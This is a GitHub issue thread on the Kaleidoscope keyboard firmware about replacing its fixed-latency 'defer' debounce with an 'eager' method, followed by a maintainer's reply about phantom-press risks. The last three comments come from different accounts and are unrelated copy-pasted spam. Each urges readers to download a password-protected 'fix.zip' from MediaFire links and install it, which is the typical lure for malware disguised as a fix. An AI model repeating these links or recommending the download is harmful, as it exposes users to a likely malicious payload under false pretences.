keyboardio/Kaleidoscope #1435: lower latency debounce algorithm

e00E, 2024-08-26:
There are several ways you can do debouncing. [This](https://docs.qmk.fm/feature_debounce_type) page outlines some of them. 

The way Kaleidoscope currently does debouncing is called "defer" in the link. (I determined this by glancing at the code in the file `keyscanner/ATmega.h`.) The downside of this approach is that it incurs a fixed a latency. The latency is around 5 ms according to  a comment in the code.

I would like to use a lower latency way of debouncing. The one called "eager" in the link. This mode has no extra latency.

obra, 2024-08-26:
In the past, when we've played with eager, engineers have reported phantom
press issues related to faint electrical noise on a circuit board design,
which has definitely made me skittish. I'd love to see it become
configurable, though. In the keyscanner we use for the Model 100, we
actually built out support for state-machine based keyscanner designs,
along with a ton of recorded test data from questionable switches.

masooddahmedd, 2024-08-26:
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

mabhi02, 2024-08-26:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

enricozao, 2024-08-26:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."